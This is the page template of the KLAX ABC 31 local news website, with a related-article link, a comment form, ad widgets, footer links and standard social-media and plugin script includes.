				<div class="article-content">

					<h3 class="entry-title">
						<a href="http://klax-tv.com/pineville-rotary-club-gives-out-free-dictionaries/" rel="bookmark" title="Pineville Rotary Club Gives Out Free Dictionaries">Pineville Rotary Club Gives Out Free Dictionaries</a>
					</h3><!--/.post-title-->

					<div class="below-entry-meta">
						<span class="posted-on"><a href="http://klax-tv.com/pineville-rotary-club-gives-out-free-dictionaries/" title="9:56 am" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2015-10-08T09:56:25-05:00">October 8, 2015</time></a></span>
						<span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>

											</div>

				</div>

			</div><!--/.related-->
		
	</div><!--/.post-related-->


      
<div id="comments" class="comments-area">

	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/attempted-2nd-degree-murder-and-armed-robbery-arrest/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=attempted-2nd-degree-murder-and-armed-robbery-arrest#respond" style="display:none;">Cancel reply</a></small></h3><form action="http://klax-tv.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<div class="gglcptch gglcptch_v2"><div id="gglcptch_recaptcha_231823385" class="gglcptch_recaptcha"></div>
				<noscript>
					<div style="width: 302px;">
						<div style="width: 302px; height: 422px; position: relative;">
							<div style="width: 302px; height: 422px; position: absolute;">
								<iframe src="https://www.google.com/recaptcha/api/fallback?k=6LcJUPMSAAAAAEnli02Dj7ZdXKtI9W4FGTJ_CQIW" frameborder="0" scrolling="no" style="width: 302px; height:422px; border-style: none;"></iframe>
							</div>
						</div>
						<div style="border-style: none; bottom: 12px; left: 25px; margin: 0px; padding: 0px; right: 25px; background: #f9f9f9; border: 1px solid #c1c1c1; border-radius: 3px; height: 60px; width: 300px;">
							<textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px !important; height: 40px !important; border: 1px solid #c1c1c1 !important; margin: 10px 25px !important; padding: 0px !important; resize: none !important;"></textarea>
						</div>
					</div>
				</noscript></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='70122' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
</div><!-- #comments -->
	</div><!-- #primary -->

	
<div id="secondary">
			
		<aside id="media_image-41" class="widget widget_media_image clearfix"><a href="https://klax.incentrev.com/alexandria/deals?fbclid=IwAR23wXpcAIALXvjGpOTllzmOII-NHPllZYESh74WCQCMPbJZg2JFhrLyBfI"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2019/08/dollar-deals-logo-300x250.jpg" class="image wp-image-65535  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" /></a></aside><aside id="media_image-31" class="widget widget_media_image clearfix"><a href="https://englandoaks.org/"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2020/03/EO-300x250-web-banner.jpg" class="image wp-image-68924  attachment-full size-full" alt="" style="max-width: 100%; height: auto;" /></a></aside><aside id="media_image-45" class="widget widget_media_image clearfix"><a href="https://www.alexandriaer.com/"><img width="240" height="300" src="http://klax-tv.com/wp-content/uploads/2020/02/Alexandria-Ad-01-240x300.jpg" class="image wp-image-68672  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="http://klax-tv.com/wp-content/uploads/2020/02/Alexandria-Ad-01-240x300.jpg 240w, http://klax-tv.com/wp-content/uploads/2020/02/Alexandria-Ad-01.jpg 400w" sizes="(max-width: 240px) 100vw, 240px" /></a></aside><aside id="media_image-39" class="widget widget_media_image clearfix"><a href="https://www.goarmy.com/info.html?iom=AMKU"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2020/05/300x250.jpg" class="image wp-image-69688  attachment-full size-full" alt="" style="max-width: 100%; height: auto;" /></a></aside><aside id="media_image-43" class="widget widget_media_image clearfix"><a href="https://www.opelousasgeneral.com/en/cardiovascular-services/"><img width="300" height="250" src="http://klax-tv.com/wp-content/uploads/2020/02/300x250-cardiology-300x250.jpg" class="image wp-image-68599  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" /></a></aside>
	</div>
	

</div><!-- .inner-wrap -->
</div><!-- #main -->




<footer id="colophon" class="clearfix ">
	
<div class="footer-widgets-wrapper">
	<div class="inner-wrap">
		<div class="footer-widgets-area clearfix">
         <div class="tg-footer-main-widget">
   			<div class="tg-first-footer-widget">
   				<aside id="text-31" class="widget widget_text clearfix"><h3 class="widget-title"><span>About Us</span></h3>			<div class="textwidget">KLAX ABC 31 is Central Louisiana’s source for ABC entertainment, news and sports programming.  In addition to ABC’s award-winning content, KLAX delivers a variety of top-rated syndicated programming, and local news, weather and sports through ABC 31 News. <a href="http://klax-tv.com/about/">Read more...</a></div>
		</aside>   			</div>
         </div>
         <div class="tg-footer-other-widgets">
   			<div class="tg-second-footer-widget">
   				<aside id="linkcat-5" class="widget widget_links clearfix"><h3 class="widget-title"><span>Useful Links</span></h3>
	<ul class='xoxo blogroll'>
<li><a href="http://abc.go.com/" title="Watch ABC shows online!" target="_blank">Watch ABC On-Demand</a></li>
<li><a href="http://www.metv.com" target="_blank">Me-TV Alexandria</a></li>
<li><a href="http://klax-tv.com/gas-buddy/">Gas Buddy</a></li>
<li><a href="http://www.littonweekendadventure.com/">Litton&#039;s Weekend Adventure</a></li>
<li><a href="http://abcnews.go.com/health%20">ABC Health News</a></li>
<li><a href="http://abcnews.go.com/">ABC News</a></li>
<li><a href="https://klaxtv.securepayments.cardpointe.com/pay?total=0.00" title="Make a credit card payment for advertising invoices">Make a payment</a></li>
<li><a href="https://publicfiles.fcc.gov/tv-profile/klax-tv" title="KLAX Public File at FCC.gov" target="_blank">FCC Public File</a></li>
<li><a href="http://klax-tv.com/wp-content/uploads/2020/02/2020-EEO-Public-File-Report-LA.pdf" title="KLAX EEO Information" target="_blank">EEO</a></li>

	</ul>
</aside>
   			</div>
            <div class="tg-third-footer-widget">
               <aside id="theme-my-login-3" class="widget widget_theme_my_login clearfix"><h3 class="widget-title"><span>Log In</span></h3><div class="tml tml-login">
<form name="login" action="http://klax-tv.com/login/" method="post">
<div class="tml-field-wrap tml-log-wrap">
<label class="tml-label" for="user_login">Username</label>
<input name="log" type="text" value="" id="user_login" class="tml-field">
</div>

<div class="tml-field-wrap tml-pwd-wrap">
<label class="tml-label" for="user_pass">Password</label>
<input name="pwd" type="password" value="" id="user_pass" class="tml-field">
</div>


<div class="tml-field-wrap tml-rememberme-wrap">
<input name="rememberme" type="checkbox" value="forever" id="rememberme" class="tml-checkbox">
<label class="tml-label" for="rememberme">Remember Me</label>
</div>

<div class="tml-field-wrap tml-submit-wrap">
<input name="submit" type="submit" value="Log In" class="tml-button">
</div>

<input name="redirect_to" type="hidden" value="/attempted-2nd-degree-murder-and-armed-robbery-arrest/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=attempted-2nd-degree-murder-and-armed-robbery-arrest">

</form>
</div>
</aside>            </div>
            <div class="tg-fourth-footer-widget">
               <aside id="colormag_125x125_advertisement_widget-6" class="widget widget_125x125_advertisement clearfix">
		<div class="advertisement_125x125">
			<div class="advertisement-content"><a href="http://www.tmz.com" class="single_ad_125x125" target="_blank" rel="nofollow">
                                 <img src="http://klax-tv.com/wp-content/uploads/2016/09/tmz.png" width="125" height="125" alt="">
                              </a></div>		</div>
		</aside>            </div>
         </div>
		</div>
	</div>
</div>	<div class="footer-socket-wrapper clearfix">
		<div class="inner-wrap">
			<div class="footer-socket-area">
				<div class="footer-socket-right-section">
							<div class="social-links clearfix">
			<ul>
				<li><a href="http://www.Facebook.com/KLAX31" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://twitter.com/KLAXTV" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/klaxtv/" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://www.youtube.com/klaxproduction" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>

				<div class="footer-socket-left-section">
					<div class="copyright">Copyright &copy; 2020 <a href="http://klax-tv.com/" title="KLAX-TV" ><span>KLAX-TV</span></a>. All rights reserved.<br>Theme: ColorMag by <a href="https://themegrill.com/themes/colormag" target="_blank" title="ThemeGrill" rel="author"><span>ThemeGrill</span></a>. Powered by <a href="https://wordpress.org" target="_blank" title="WordPress"><span>WordPress</span></a>.</div>				</div>
			</div>
		</div>
	</div>
</footer>

<a href="#masthead" id="scroll-up"><i class="fa fa-chevron-up"></i></a>

</div><!-- #page -->
			<div id="fb-root"></div>
			<script>(function(d, s, id) {
				var js, fjs = d.getElementsByTagName(s)[0]; 

				if (d.getElementById(id)) return;
				js = d.createElement(s); js.id = id;

				js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=1443946719181573&version=v2.12";
				fjs.parentNode.insertBefore(js, fjs);
				}(document, 'script', 'facebook-jssdk'));
			</script>
					<script type="text/javascript">
				!function(d,s,id) {var js,fjs=d.getElementsByTagName(s)[0];if (!d.getElementById(id)) {js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
			</script>
					<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
		<script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};/* ]]> */ </script><link rel='stylesheet' id='gglcptch-css'  href='http://klax-tv.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.55' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var click_object = {"ajax_url":"http:\/\/klax-tv.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var themeMyLogin = {"action":"","errors":[]};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/theme-my-login/assets/scripts/theme-my-login.min.js?ver=7.0.15'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/comment-reply.min.js?ver=5.3.4'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/jquery.bxslider.min.js?ver=4.2.10'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/navigation.js?ver=5.3.4'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/news-ticker/jquery.newsTicker.min.js?ver=1.0.0'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/sticky/jquery.sticky.js?ver=20150309'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js?ver=20150311'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/skip-link-focus-fix.js?ver=5.3.4'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/colormag-custom.js?ver=5.3.4'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/wp-embed.min.js?ver=5.3.4'></script>
<script type='text/javascript' data-cfasync="false" async="async" defer="defer" src='https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=1.55'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gglcptch = {"options":{"version":"v2","sitekey":"6LcJUPMSAAAAAEnli02Dj7ZdXKtI9W4FGTJ_CQIW","error":"<strong>Warning<\/strong>:&nbsp;More than one reCAPTCHA has been found in the current form. Please remove all unnecessary reCAPTCHA fields to make it work properly.","disable":0,"theme":"light"},"vars":{"visibility":false}};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/google-captcha/js/script.js?ver=1.55'></script>
</body>
</html>
